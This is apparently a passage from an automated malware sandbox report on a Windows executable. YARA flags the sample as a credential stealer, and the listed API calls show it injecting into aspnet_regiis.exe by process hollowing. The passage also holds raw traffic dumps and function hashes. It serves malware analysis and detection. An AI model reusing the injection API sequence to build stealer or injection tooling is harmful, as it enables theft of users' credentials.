{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BM1utPa%2FzfIa6d%2FYlKMevazKV2Y2to1M7a5pJ6Y0WxK5k3pjcgUeWEXhcxAHDb2X6b6T4gyc2YloZcRVrIEP8ilOPaLLTi1U9HzK7vFirMtX7Rm6hgZxKkcaViYnooYs%2BCDkdA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9ef1cc91a78e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1966&rtt_var=745&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=991&delivery_rate=1461461&cwnd=234&unsent_bytes=0&cid=e543e447add6a923&ts=484&x=0"
2025-01-04 08:42:14 UTC	240	IN	Data Raw: 33 36 65 34 0d 0a 38 62 70 36 6b 76 74 76 63 56 53 67 49 6f 69 2f 72 4a 66 39 4a 33 6d 6c 6f 66 72 78 67 50 66 4a 58 58 56 46 49 36 2f 68 5a 62 6d 71 77 56 6a 30 6a 30 31 4c 5a 59 77 41 37 5a 32 57 70 74 45 46 48 59 65 62 32 4c 4c 6f 67 4b 51 53 45 77 31 78 78 35 45 4c 34 63 50 73 47 4b 57 58 47 30 59 49 6a 30 7a 63 69 74 54 2b 69 33 51 44 33 64 57 44 6b 73 32 57 76 68 55 7a 4b 6e 72 39 30 56 44 33 75 65 67 57 70 73 35 58 50 78 50 6e 54 2b 7a 76 39 73 47 4c 55 69 36 57 31 39 47 56 30 4a 6d 4f 46 6b 77 4a 63 2b 6a 53 4c 38 47 4a 79 44 76 78 72 41 63 5a 48 50 52 4a 2f 39 44 50 33 5a 64 4a 41 5a 58 34 6d 36 75 78 7a 71 55 4b 58 6e 42 42 79 72 31 4b 6a 4d 47 52 47 63 75 4a 58 77 4a 73 77 6b 48 6d 2b 2b 76 6b 76 31 Data Ascii: 36e48bp6kvtvcVSgIoi/rJf9J3mlofrxgPfJXXVFI6/hZbmqwVj0j01LZYwA7Z2WptEFHYeb2LLogKQSEw1xx5EL4cPsGKWXG0YIj0zcitT+i3QD3dWDks2WvhUzKnr90VD3uegWps5XPxPnT+zv9sGLUi6W19GV0JmOFkwJc+jSL8GJyDvxrAcZHPRJ/9DP3ZdJAZX4m6uxzqUKXnBByr1KjMGRGcuJXwJswkHm++vkv1
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 38 62 6a 75 53 65 76 74 53 31 69 42 49 57 43 33 2b 41 70 77 6e 54 77 4f 35 49 79 36 30 4b 51 67 50 38 44 61 50 4e 6c 63 47 65 5a 41 6a 4b 39 62 69 41 34 6f 47 38 43 44 67 41 54 63 75 45 41 65 58 65 7a 42 7a 71 30 44 38 30 42 73 4d 53 36 65 2f 57 72 71 45 49 48 4e 4c 75 74 49 66 54 6e 4b 67 6b 54 42 42 62 6d 4a 51 4f 34 38 4c 54 53 64 69 44 42 30 63 46 77 33 58 78 31 2b 6a 50 6c 6c 31 4d 6c 66 57 57 78 76 6a 48 6b 44 77 76 64 42 72 44 74 6b 36 4b 6b 39 38 6d 76 5a 6b 59 51 44 66 70 64 72 6a 4d 6c 66 57 65 53 54 33 69 7a 4c 69 4a 34 62 43 4d 4f 54 6f 52 59 4d 69 57 43 50 61 58 38 6a 6a 36 69 77 45 70 5a 76 5a 41 76 39 50 59 6f 4b 45 49 45 2f 47 55 6b 70 6a 32 70 4c 4d 6c 4f 7a 78 41 34 64 63 53 38 62 66 56 49 38 44 4c 57 6a 77 5a 36 47 48 52 69 70 54 7a 75 Data Ascii: 8bjuSevtS1iBIWC3+ApwnTwO5Iy60KQgP8DaPNlcGeZAjK9biA4oG8CDgATcuEAeXezBzq0D80BsMS6e/WrqEIHNLutIfTnKgkTBBbmJQO48LTSdiDB0cFw3Xx1+jPll1MlfWWxvjHkDwvdBrDtk6Kk98mvZkYQDfpdrjMlfWeST3izLiJ4bCMOToRYMiWCPaX8jj6iwEpZvZAv9PYoKEIE/GUkpj2pLMlOzxA4dcS8bfVI8DLWjwZ6GHRipTzu
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 55 79 74 72 6a 72 72 74 74 42 6e 31 42 7a 49 38 68 2f 6f 4c 34 41 76 4f 38 4b 68 55 62 39 47 48 67 79 4d 48 59 6d 32 38 72 7a 64 47 55 71 62 4b 68 71 32 6f 5a 4d 52 54 7a 7a 67 76 74 78 4d 49 54 35 4b 67 56 43 53 44 5a 51 63 58 65 32 39 2b 37 53 43 44 33 6b 63 2b 38 79 37 2b 4b 42 45 42 39 52 2b 69 6d 43 4e 32 58 34 43 7a 6b 6a 6a 68 43 49 6f 74 47 32 4e 48 72 33 4d 52 72 4b 65 4b 53 73 49 62 34 68 59 67 2b 49 69 31 4c 35 37 55 4f 7a 70 37 5a 4d 50 69 56 46 30 45 4e 77 58 69 35 68 73 44 41 31 68 49 62 77 50 33 56 78 4c 44 63 71 67 51 48 64 56 43 58 67 77 62 58 74 66 30 4a 30 49 4d 4f 4e 68 48 45 62 64 7a 38 78 4f 43 51 61 42 2f 74 38 35 4b 42 37 71 2f 37 43 78 64 79 54 39 76 57 4f 5a 61 66 37 6b 2f 71 6b 68 6b 69 4c 74 68 57 38 64 7a 68 39 6f 70 76 50 38 Data Ascii: UytrjrrttBn1BzI8h/oL4AvO8KhUb9GHgyMHYm28rzdGUqbKhq2oZMRTzzgvtxMIT5KgVCSDZQcXe29+7SCD3kc+8y7+KBEB9R+imCN2X4CzkjjhCIotG2NHr3MRrKeKSsIb4hYg+Ii1L57UOzp7ZMPiVF0ENwXi5hsDA1hIbwP3VxLDcqgQHdVCXgwbXtf0J0IMONhHEbdz8xOCQaB/t85KB7q/7CxdyT9vWOZaf7k/qkhkiLthW8dzh9opvP8
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 31 73 47 35 50 6a 30 71 45 4d 69 6e 56 34 6a 49 31 69 32 72 75 43 70 41 4f 66 49 56 7a 76 44 6c 77 59 70 77 43 73 66 43 6c 4c 33 4b 70 5a 6f 61 4f 77 4e 4f 37 59 6c 54 37 70 54 71 49 4f 71 49 48 68 30 37 30 42 50 72 31 66 54 62 68 78 4d 70 34 64 61 78 6e 38 4f 6e 69 32 6f 6a 4c 33 66 59 32 51 50 41 6b 4f 4d 7a 2f 72 63 6e 42 42 6a 6e 57 38 44 6e 39 76 71 4b 62 68 58 76 69 70 33 49 36 4a 57 76 4b 69 63 31 61 76 65 5a 42 74 61 58 30 69 44 32 79 78 30 53 5a 4e 67 57 2b 65 72 77 75 4a 64 58 45 4d 54 44 6f 4c 6e 72 67 59 51 76 58 6a 56 61 35 4c 67 63 37 71 66 65 4e 65 4b 35 4b 42 30 41 31 6b 76 44 6a 4d 50 77 6c 6d 6f 49 78 73 32 66 71 4d 33 4f 6e 58 59 2f 45 32 76 46 6a 52 58 34 6d 4e 38 76 71 72 55 42 50 41 69 50 52 38 2f 6d 77 38 36 4d 51 44 7a 45 38 72 7a Data Ascii: 1sG5Pj0qEMinV4jI1i2ruCpAOfIVzvDlwYpwCsfClL3KpZoaOwNO7YlT7pTqIOqIHh070BPr1fTbhxMp4daxn8Oni2ojL3fY2QPAkOMz/rcnBBjnW8Dn9vqKbhXvip3I6JWvKic1aveZBtaX0iD2yx0SZNgW+erwuJdXEMTDoLnrgYQvXjVa5Lgc7qfeNeK5KB0A1kvDjMPwlmoIxs2fqM3OnXY/E2vFjRX4mN8vqrUBPAiPR8/mw86MQDzE8rz
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 67 6f 43 45 6c 48 70 30 46 79 4a 75 2b 5a 56 33 35 4d 36 46 68 33 4b 53 66 48 6a 67 38 37 4f 45 6b 6e 51 35 34 43 69 31 34 54 35 62 7a 51 77 5a 2f 71 4e 56 75 75 63 34 43 7a 32 74 44 73 7a 4e 64 4e 4a 30 49 7a 39 78 5a 52 31 53 66 61 54 76 4a 4f 33 73 5a 73 6e 54 41 42 6c 7a 61 34 6b 77 37 7a 4e 4f 66 53 42 57 51 49 34 35 55 62 50 33 50 54 6e 71 47 45 77 37 4d 71 74 73 73 65 53 69 67 77 7a 45 33 50 4b 76 55 71 49 6f 50 55 33 6f 70 6b 58 43 77 50 6c 53 75 54 61 79 74 4f 34 46 30 44 4c 30 5a 58 42 7a 4c 43 5a 4e 52 4d 2f 53 4e 65 4f 4d 65 43 74 6c 54 4b 35 6f 52 30 58 43 49 39 33 34 59 66 47 77 34 56 71 50 35 33 6a 6c 6f 44 6c 72 72 74 74 4a 53 70 30 79 4b 63 39 37 72 6a 2b 54 4f 71 36 57 42 67 73 30 31 48 78 36 73 48 59 6d 32 45 4d 77 38 79 6a 6e 73 71 43 Data Ascii: goCElHp0FyJu+ZV35M6Fh3KSfHjg87OEknQ54Ci14T5bzQwZ/qNVuuc4Cz2tDszNdNJ0Iz9xZR1SfaTvJO3sZsnTABlza4kw7zNOfSBWQI45UbP3PTnqGEw7MqtsseSigwzE3PKvUqIoPU3opkXCwPlSuTaytO4F0DL0ZXBzLCZNRM/SNeOMeCtlTK5oR0XCI934YfGw4VqP53jloDlrrttJSp0yKc97rj+TOq6WBgs01Hx6sHYm2EMw8yjnsqC
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 4a 36 6d 74 41 41 33 4c 75 50 4c 4d 57 6f 46 69 63 38 6b 48 6a 4b 38 50 6e 6a 6e 33 63 75 77 35 54 4d 71 37 53 38 6d 41 73 53 50 30 66 4e 74 43 33 75 6c 74 49 37 30 62 38 75 47 7a 72 31 62 73 66 78 32 73 4b 50 59 7a 36 64 2b 4b 69 63 32 71 47 74 45 69 45 6e 61 5a 61 41 49 4d 2b 68 36 44 6e 4f 31 44 73 6e 4a 75 74 73 76 4e 36 59 35 72 46 54 4f 49 37 5a 7a 62 76 4d 6f 61 59 52 42 44 78 7a 33 61 34 68 2f 35 37 6a 4b 4b 4c 4f 49 51 49 36 6b 55 33 55 6b 4e 7a 7a 75 47 74 4c 77 66 61 4a 6e 72 4f 57 71 47 55 2b 47 51 7a 6b 67 31 44 53 73 49 49 59 77 72 77 33 51 44 4f 5a 43 64 37 74 37 66 57 53 45 77 76 48 38 61 32 58 74 4a 32 66 62 54 41 63 53 4e 6e 54 4f 5a 62 43 79 56 48 69 6d 51 6f 74 65 35 56 6f 76 74 44 74 78 35 70 4c 51 63 6a 37 6f 4c 33 6f 6f 76 34 77 4e Data Ascii: J6mtAA3LuPLMWoFic8kHjK8Pnjn3cuw5TMq7S8mAsSP0fNtC3ultI70b8uGzr1bsfx2sKPYz6d+Kic2qGtEiEnaZaAIM+h6DnO1DsnJutsvN6Y5rFTOI7ZzbvMoaYRBDxz3a4h/57jKKLOIQI6kU3UkNzzuGtLwfaJnrOWqGU+GQzkg1DSsIIYwrw3QDOZCd7t7fWSEwvH8a2XtJ2fbTAcSNnTOZbCyVHimQote5VovtDtx5pLQcj7oL3oov4wN
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 39 53 73 4f 55 2b 42 7a 31 6a 31 59 62 45 35 42 55 2f 65 69 66 34 64 5a 44 4c 76 58 72 6a 59 54 6a 6b 66 46 74 44 44 46 4e 33 59 34 78 36 4a 6e 79 48 73 57 71 4e 79 31 37 32 56 44 55 6b 49 66 50 69 51 77 36 6c 70 4f 33 6b 39 50 63 2f 44 38 51 47 51 79 61 30 44 79 42 6e 2b 6f 79 36 73 49 56 4a 52 2b 54 43 66 33 58 34 74 53 34 51 30 6a 2f 77 4a 79 74 72 37 75 5a 45 42 4d 42 63 63 65 58 4f 5a 61 6f 77 67 37 65 7a 41 4d 46 59 2f 77 4e 35 74 33 68 79 39 4a 64 46 38 76 56 67 72 62 68 7a 6f 51 38 41 67 31 2f 67 4c 68 64 33 49 76 77 4e 64 6a 49 46 69 4d 75 79 48 6a 39 39 65 44 69 68 58 49 32 38 66 57 4e 71 64 47 38 6e 41 6b 2f 66 57 76 43 6c 68 7a 65 71 59 67 2f 34 4d 67 58 4f 67 4c 46 64 4f 48 52 33 36 4f 54 54 52 6a 77 31 6f 75 2b 38 4b 76 6d 41 56 70 33 62 73 Data Ascii: 9SsOU+Bz1j1YbE5BU/eif4dZDLvXrjYTjkfFtDDFN3Y4x6JnyHsWqNy172VDUkIfPiQw6lpO3k9Pc/D8QGQya0DyBn+oy6sIVJR+TCf3X4tS4Q0j/wJytr7uZEBMBcceXOZaowg7ezAMFY/wN5t3hy9JdF8vVgrbhzoQ8Ag1/gLhd3IvwNdjIFiMuyHj99eDihXI28fWNqdG8nAk/fWvClhzeqYg/4MgXOgLFdOHR36OTTRjw1ou+8KvmAVp3bs
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 71 4d 6b 39 71 36 6b 46 47 51 69 50 59 65 44 39 2f 63 76 53 63 44 33 70 6b 35 47 44 35 4c 2f 34 5a 42 4d 52 45 4f 6d 58 42 74 50 44 39 54 2f 69 6a 56 59 53 4f 75 52 4c 6f 38 75 55 77 4a 78 4c 4c 76 4c 62 72 37 6e 4b 6f 4b 55 79 44 54 64 69 79 6f 4d 43 30 61 32 56 43 38 4f 4d 4f 42 41 36 39 45 7a 77 6a 2f 33 5a 72 42 55 2f 6c 76 76 52 67 65 4b 53 71 69 38 77 4d 6e 50 75 70 68 4c 56 79 4d 6f 6f 2f 62 38 42 47 7a 7a 76 43 63 76 33 77 4e 48 46 5a 42 48 53 7a 4c 2b 31 35 4b 53 73 46 42 73 63 64 4a 69 74 55 74 57 46 6a 54 58 41 69 56 30 34 4f 63 39 44 78 65 76 55 7a 71 73 4d 45 50 6d 4f 6b 63 54 6e 71 2b 59 58 50 77 42 51 6d 4e 41 77 2b 35 66 57 54 66 53 63 47 30 67 2b 35 78 4c 2b 79 76 75 6b 69 77 77 64 36 50 61 79 76 71 75 69 68 52 63 50 49 55 53 45 75 54 7a Data Ascii: qMk9q6kFGQiPYeD9/cvScD3pk5GD5L/4ZBMREOmXBtPD9T/ijVYSOuRLo8uUwJxLLvLbr7nKoKUyDTdiyoMC0a2VC8OMOBA69Ezwj/3ZrBU/lvvRgeKSqi8wMnPuphLVyMoo/b8BGzzvCcv3wNHFZBHSzL+15KSsFBscdJitUtWFjTXAiV04Oc9DxevUzqsMEPmOkcTnq+YXPwBQmNAw+5fWTfScG0g+5xL+yvukiwwd6PayvquihRcPIUSEuTz
2025-01-04 08:42:14 UTC	1369	IN	Data Raw: 76 79 30 44 42 38 47 6b 78 66 6c 33 4a 37 46 73 52 42 53 6e 4a 66 4b 6e 39 6a 47 73 53 67 6c 45 57 54 58 6c 44 4c 61 6f 2f 45 43 2f 62 30 5a 50 41 62 49 61 4d 62 61 35 4e 4c 4e 45 67 72 72 35 6f 32 63 34 63 53 54 44 53 55 7a 47 70 79 58 54 74 32 6b 31 44 4b 35 77 69 45 31 45 35 64 34 38 50 37 65 33 37 68 77 44 66 66 70 6c 35 72 36 75 71 6f 49 48 79 74 67 6e 34 51 41 34 34 58 4f 45 66 2f 51 52 44 55 78 79 42 65 35 35 63 2f 79 6b 78 63 4f 36 4d 44 4e 6e 38 47 57 75 6a 38 33 4a 46 6e 71 67 79 37 74 6c 38 49 43 38 62 51 31 46 77 61 58 65 4f 62 59 6e 73 4f 58 45 45 32 63 6c 72 61 66 30 63 4b 78 41 56 6f 5a 44 50 75 6a 48 63 75 36 32 53 7a 7a 67 31 30 33 4a 76 46 77 2b 59 72 69 6f 4c 56 69 48 70 44 47 6e 72 62 48 6a 5a 41 2b 58 69 51 51 33 72 45 56 37 72 66 51 Data Ascii: vy0DB8Gkxfl3J7FsRBSnJfKn9jGsSglEWTXlDLao/EC/b0ZPAbIaMba5NLNEgrr5o2c4cSTDSUzGpyXTt2k1DK5wiE1E5d48P7e37hwDffpl5r6uqoIHytgn4QA44XOEf/QRDUxyBe55c/ykxcO6MDNn8GWuj83JFnqgy7tl8IC8bQ1FwaXeObYnsOXEE2clraf0cKxAVoZDPujHcu62Szzg103JvFw+YrioLViHpDGnrbHjZA+XiQQ3rEV7rfQ

Target ID:	0
Start time:	03:41:58
Start date:	04/01/2025
Path:	C:\Users\user\Desktop\9cOUjp7ybm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9cOUjp7ybm.exe"
Imagebase:	0x3d0000
File size:	760'832 bytes
MD5 hash:	7177B0BA961DDD258EE9672D436D6B63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:41:58
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:41:58
Start date:	04/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x200000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:41:58
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224
Imagebase:	0x9c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.5%
Total number of Nodes:	647
Total number of Limit Nodes:	8

Executed Functions

Function 6CE18870 Relevance: 78.2, APIs: 24, Strings: 17, Instructions: 6458nativethreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 6CE1A29C
ShowWindow.USER32 ref: 6CE1A2CD
VirtualAlloc.KERNELBASE ref: 6CE1A517
NtGetContextThread.NTDLL ref: 6CE1AE85
NtAllocateVirtualMemory.NTDLL ref: 6CE1AF41
NtAllocateVirtualMemory.NTDLL ref: 6CE1AFB9
NtWriteVirtualMemory.NTDLL ref: 6CE1B017
NtWriteVirtualMemory.NTDLL ref: 6CE1B4C9
NtWriteVirtualMemory.NTDLL ref: 6CE1BA07
NtReadVirtualMemory.NTDLL ref: 6CE1CFAE
NtWriteVirtualMemory.NTDLL ref: 6CE1D1D5
NtWriteVirtualMemory.NTDLL ref: 6CE1D7B0
NtCreateThreadEx.NTDLL ref: 6CE1DBCD
NtSetContextThread.NTDLL ref: 6CE1DF25
NtResumeThread.NTDLL ref: 6CE1DF43
CloseHandle.KERNEL32 ref: 6CE1E085
CloseHandle.KERNEL32 ref: 6CE1E099
NtReadVirtualMemory.NTDLL ref: 6CE1E67A
CreateProcessW.KERNEL32 ref: 6CE1E85D
NtWriteVirtualMemory.NTDLL ref: 6CE1E8F6
NtWriteVirtualMemory.NTDLL ref: 6CE1EB5C
NtSetContextThread.NTDLL ref: 6CE1EC70
NtResumeThread.NTDLL ref: 6CE1EC8E

Strings

@?Z-, xrefs: 6CE1BC1A
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CE1ABA6, 6CE1E22E, 6CE1ECC6
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CE1A7B2, 6CE1E7A8
>D?t, xrefs: 6CE1C453
K?H, xrefs: 6CE1ADFD
.#}$, xrefs: 6CE1B6D5
kernel32.dll, xrefs: 6CE1A2D3
z$, xrefs: 6CE1A81A
ntdll.dll, xrefs: 6CE1A2E7
d8j), xrefs: 6CE1C122
MZx, xrefs: 6CE1A2FB, 6CE1A317
>D?t, xrefs: 6CE1E9F3
d8j), xrefs: 6CE1C230
D, xrefs: 6CE1E760
^, xrefs: 6CE1EBC5
@, xrefs: 6CE1AFB1
0g5, xrefs: 6CE1AA72

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: Virtual$Memory$Write$Thread$Context$AllocateCloseCreateHandleReadResumeWindow$AllocConsoleProcessShow
String ID: .#}$$0g5$>D?t$>D?t$@$@?Z-$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$^$d8j)$d8j)$kernel32.dll$ntdll.dll$z$$K?H
API String ID: 2455923772-2427965612
Opcode ID: f05251c8b101c07b091ba2dbcae51d4d6bf002c0742415117905057775a28924
Instruction ID: 0ba8952925f574a3fdfb4e2054c91b73f1051487a814609668027a3ab692fe0c
Opcode Fuzzy Hash: f05251c8b101c07b091ba2dbcae51d4d6bf002c0742415117905057775a28924
Instruction Fuzzy Hash: 09B31F36B192158FCB18CE3CD9D43D93BF2AB47354F219199E419DBBA0C6359E8A8F40

Function 6CE117C0 Relevance: 75.8, APIs: 25, Strings: 16, Instructions: 4011filememoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6CE12951
K32GetModuleInformation.KERNEL32 ref: 6CE12C5F
GetModuleFileNameA.KERNEL32 ref: 6CE12ED8
CreateFileA.KERNELBASE ref: 6CE13092
CreateFileMappingA.KERNEL32 ref: 6CE1324A
CloseHandle.KERNEL32 ref: 6CE135AF
MapViewOfFile.KERNELBASE ref: 6CE138DB
VirtualProtect.KERNELBASE ref: 6CE1434F
VirtualProtect.KERNELBASE ref: 6CE145B9
CloseHandle.KERNEL32 ref: 6CE14928
CloseHandle.KERNEL32 ref: 6CE14DF2
MapViewOfFile.KERNEL32 ref: 6CE14E46
VirtualProtect.KERNEL32 ref: 6CE1509F
CreateFileA.KERNEL32 ref: 6CE1523A
CreateFileMappingA.KERNEL32 ref: 6CE1528C
MapViewOfFile.KERNEL32 ref: 6CE152FE
CloseHandle.KERNEL32 ref: 6CE1541C
CloseHandle.KERNEL32 ref: 6CE15430
CreateFileA.KERNEL32 ref: 6CE154DE

Strings

![6s, xrefs: 6CE153CF
H-RS, xrefs: 6CE1367E
KGT, xrefs: 6CE13844
$v, xrefs: 6CE13E3C
6,LQ, xrefs: 6CE12E3D
Bc}s, xrefs: 6CE142F1
6,LQ, xrefs: 6CE12E8E
![6s, xrefs: 6CE1411F
dZU5, xrefs: 6CE12731
iR%, xrefs: 6CE13759
@, xrefs: 6CE15093
wzc, xrefs: 6CE13528
KCp>, xrefs: 6CE13EF6
$v, xrefs: 6CE13E91
H-RS, xrefs: 6CE136F4
hVf}, xrefs: 6CE148A9

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: File$Handle$CloseCreate$ModuleProtectViewVirtual$Mapping$InformationName
String ID: ![6s$![6s$6,LQ$6,LQ$@$Bc}s$H-RS$H-RS$KCp>$KGT$dZU5$hVf}$iR%$wzc$$v$$v
API String ID: 3643185851-3117542509
Opcode ID: 2f228368b644a9bdc55271f4c1f39b09ed9748a4890ef037cf468c2d33a58e42
Instruction ID: cfad85a1845f422d6941b330dc8cbd42543bcbe6b83d9bfdd9931deafc2ad8dc
Opcode Fuzzy Hash: 2f228368b644a9bdc55271f4c1f39b09ed9748a4890ef037cf468c2d33a58e42
Instruction Fuzzy Hash: 83630136B092108FDB14CEBCC9947DD77F2AB47354F209659D41ADBB94C23A8A4ACF12

Function 6CE17960 Relevance: 9.7, APIs: 3, Strings: 2, Instructions: 984
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?), ref: 6CE17FAB
NtQueryInformationProcess.NTDLL ref: 6CE1802B
GetModuleHandleW.KERNEL32(?), ref: 6CE18652

Strings

NtQueryInformationProcess, xrefs: 6CE17FB3, 6CE1865A
ntdll.dll, xrefs: 6CE17F9F, 6CE18646

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: HandleModule$InformationProcessQuery
String ID: NtQueryInformationProcess$ntdll.dll
API String ID: 188072037-2906145389
Opcode ID: f1c3275b2b4cbe73c951ceec3031248d8fdadd05b3386b39449f78308ee097e2
Instruction ID: ea7b9b4d0326f9b6590b9535df0e4f4d66ff61fd86055e7c0746dfa38332f4d4
Opcode Fuzzy Hash: f1c3275b2b4cbe73c951ceec3031248d8fdadd05b3386b39449f78308ee097e2
Instruction Fuzzy Hash: CB720176B482058FCB08CEBCD5D53CE7BF2AB47354F21A61AD411DBB94D73A891A8B01

Function 6CE1FAE8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CE1FB2F
___scrt_uninitialize_crt.LIBCMT ref: 6CE1FB49

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 82f9a7066add725c5a66aa5eff10c532981a94149e3f2f31cd4f932d9fc47f8e
Instruction ID: c29dd025a66b78ae9460c720ddd5cbcdded71cca6131b567a86f1f37c7ccc40e
Opcode Fuzzy Hash: 82f9a7066add725c5a66aa5eff10c532981a94149e3f2f31cd4f932d9fc47f8e
Instruction Fuzzy Hash: D841F272E08628AFDB118F69C840FDE3A78EB45B9CF30411AE81467F40C7394A65DBE0

Function 6CE1FB98 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CE1FBD5
dllmain_crt_dispatch.LIBCMT ref: 6CE1FBEC
dllmain_raw.LIBCMT ref: 6CE1FC34
dllmain_crt_dispatch.LIBCMT ref: 6CE1FC47
dllmain_raw.LIBCMT ref: 6CE1FC5A

Memory Dump Source

Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true

Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 401bd02b3709007dc62e50fab7b7cbf6922167914f7ea556e1413b673c6c5c6e
